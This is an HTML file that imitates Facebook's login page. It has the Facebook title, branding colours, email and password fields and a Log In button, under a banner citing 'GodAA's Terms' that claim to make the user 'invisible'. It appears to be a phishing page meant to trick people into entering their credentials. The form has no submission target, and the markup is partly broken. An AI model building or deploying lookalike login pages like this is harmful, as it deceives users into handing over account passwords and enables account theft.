<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="fb.png">
  <title>Facebook</title>
<style>
     [class*="col-"] {
          width: 100%;
        }


        [class*="col-"] {
            float: left;
            padding: 15px;
          }       
.header{color:#1977f3;text-align: center;}
.MTN{font-weight:100;font-size:11.5px;padding:2.5px 6.7px 2px;background-color:#e6f2ff;border-width
:0px 0px 1px 0px;border-color: #1977f38c ;border-style:groove;padding: 10px 10px 10px ;}
.fffb{border:none;paddig-right: 5px;}
input{width: 430px;height: 45px;border-radius: 6px;border: 1px groove #f5f6f8;margin-bottom:6px;
background-color:#f5f6f8;}
.iffffb{background-color:#1977f3;height: 43px;border:none;width:427px;margin-left:3px;font-size:
15.5px;color:white;font-weight: 600;margin-top:3px;}
.create_new_acc{text-align: center;background-color: #02a202;color:white;position: absolute;
border-radius:4px;border:none;font-weight:bolder;font-size:13px;padding:10px 10px 10px;margin-left
:138px}
.fp{font-size:14px ;color:#1977f3;font-weight:lighter;text-align: center;margin-left: 5px;}
.OR{height: 34px;width: 430px;}
.T_Facebook{font-family: 'Tw Cen MT';font-size:27.5px;letter-spacing: -2px;font-weight: 700;}
/*Default CSS*/
body{margin:0px; 
    padding:0px;
    justify-content: center;
     align-items: center;
     min-height: 100vh;
     flex-direction: column;
     gap: 60px;
     margin:0px;
     padding:0px;
  }
 img{height:auto; vertical-align:middle}
*{box-sizing: border-box;margin: 0px;padding: 0px;}
body{background-color: white;}
[class*="col"] {float: left;padding: 15px;}
html{font-family: "Lucida Sans", sans-serif;}
input{padding:10px 12px 10px ;font-size:14px;}
/* For mobile phones: */

/*.Now{display: none;}*/</style></U+0006DU+00065U+00074U+00061>
</head><body>
     <div class="MTN">By proceeding, you agree to GodAA's Terms, which includes making sure you are invisible the publisher when using your facebook account 
     </div>
     <div id="Now"><form style="justify-content: center;
     align-items: center;
     min-height: 100vh;
     flex-direction: column;
     gap: 60px;
     margin:0px;
     padding:0px;
     margin: auto;
     display: flex;
     ">
     
<div class="header">
<p class="T_Facebook" style="height: 0px;"> facebook </p></div> 
<div class="fffb" style="justify-content: center;
align-items: center;
min-height: 100vh;
flex-direction: column;
gap: 60px;
margin:0px;
padding:0px;">
  <input  class="col-" type="text"placeholder="Mobile number or email address" style="width: 100%;">
  <br>
  <input class="col-6 col-s-9" type="password"placeholder="Password">
  <br>
  <input  type="submit"value="Log In" class="iffffb">
  <br>
  <div class="fp">Forgotten password?
  </div>
  <br>
  <img src="C:\Users\USER\Desktop\divi\OR.jpg"class="OR">
  <div class="create_new_acc">
  <div class="cna" style="display: flex;">Create New Account
  </div>
  </div>
  </div>
</div>
</form>
</div></div>

</body>

</html>

     
</body>
</html>